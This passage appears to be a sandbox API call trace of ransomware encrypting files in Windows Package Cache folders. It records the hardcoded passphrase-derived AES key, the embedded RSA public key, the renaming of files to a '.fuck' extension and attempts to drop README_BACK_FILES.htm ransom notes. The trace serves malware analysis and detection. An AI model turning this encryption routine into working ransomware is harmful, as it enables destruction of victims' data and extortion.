Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.fuck")) returned 0 [0240.950] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.950] CryptDestroyKey (hKey=0x28e76b8) returned 1 [0240.950] CryptReleaseContext (hProv=0x28f2960, dwFlags=0x0) returned 1 [0240.950] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.950] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.950] GetLastError () returned 0x5 [0240.950] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0240.950] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x80) returned 0 [0240.951] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.951] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.952] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.952] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f2960) returned 1 [0240.954] CryptCreateHash (in: hProv=0x28f2960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.954] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.954] CryptHashData (hHash=0x28e73b8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.954] CryptDeriveKey (in: hProv=0x28f2960, Algid=0x6610, hBaseData=0x28e73b8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7738) returned 1 [0240.955] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.955] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.955] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f1db0) returned 1 [0240.955] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1db0, dwCertEncodingType=0x1, pInfo=0x2906a08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906a38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906a40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7938) returned 1 [0240.955] CryptEncrypt (in: hKey=0x28e7938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.955] CryptEncrypt (in: hKey=0x28e7938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f29e8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f29e8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.956] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f29e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.956] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.956] CryptEncrypt (in: hKey=0x28e7738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.956] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.956] CloseHandle (hObject=0xffffffff) returned 1 [0240.956] CloseHandle (hObject=0xffffffff) returned 1 [0240.956] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), bFailIfExists=0) returned 0 [0240.956] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", dwFileAttributes=0x0) returned 0 [0240.957] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.gsg")) returned 0 [0240.957] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.fuck")) returned 0 [0240.958] CryptDestroyHash (hHash=0x28e73b8) returned 1 [0240.958] CryptDestroyKey (hKey=0x28e7738) returned 1 [0240.958] CryptReleaseContext (hProv=0x28f2960, dwFlags=0x0) returned 1 [0240.958] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.958] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.958] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm")) returned 0xffffffff [0240.958] AreFileApisANSI () returned 1 [0240.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x291c908, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 142 [0240.958] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.959] GetLastError () returned 0x5 [0240.959] GetLastError () returned 0x5 [0240.959] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.959] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.959] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.960] AreFileApisANSI () returned 1 [0240.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116 [0240.960] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.960] GetLastError () returned 0x5 [0240.960] GetLastError () returned 0x5 [0240.960] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.960] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.961] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\readme_back_files.htm")) returned 0xffffffff [0240.961] AreFileApisANSI () returned 1 [0240.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0240.961] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.961] GetLastError () returned 0x5 [0240.961] GetLastError () returned 0x5 [0240.961] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.961] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.963] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.963] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.963] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.963] GetLastError () returned 0x5 [0240.963] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm")) returned 0x20 [0240.963] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x80) returned 0 [0240.964] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.964] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.964] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0240.965] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.967] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.967] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.967] CryptHashData (hHash=0x28e8578, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.967] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7238) returned 1 [0240.967] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.967] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.967] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f2c90) returned 1 [0240.968] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2c90, dwCertEncodingType=0x1, pInfo=0x29073c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29073f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907400*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7878) returned 1 [0240.968] CryptEncrypt (in: hKey=0x28e7878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.968] CryptEncrypt (in: hKey=0x28e7878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1e38*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f1e38*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.968] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1e38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.968] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.968] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.968] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.968] CloseHandle (hObject=0xffffffff) returned 1 [0240.968] CloseHandle (hObject=0xffffffff) returned 1 [0240.968] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), bFailIfExists=0) returned 0 [0240.969] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm", dwFileAttributes=0x0) returned 0 [0240.969] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.gsg")) returned 0 [0240.970] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.fuck" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.fuck")) returned 0 [0240.970] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.970] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.970] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.970] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.970] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.970] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.970] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\readme_back_files.htm")) returned 0xffffffff [0240.971] AreFileApisANSI () returned 1 [0240.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e2780, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0240.971] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.971] GetLastError () returned 0x5 [0240.971] GetLastError () returned 0x5 [0240.971] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.971] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.971] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.971] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.972] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.972] GetLastError () returned 0x5 [0240.972] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm")) returned 0x20 [0240.972] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x80) returned 0 [0240.972] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.973] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.973] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0240.973] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.976] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.976] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.976] CryptHashData (hHash=0x28e8578, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.976] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7238) returned 1 [0240.976] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.976] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.976] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 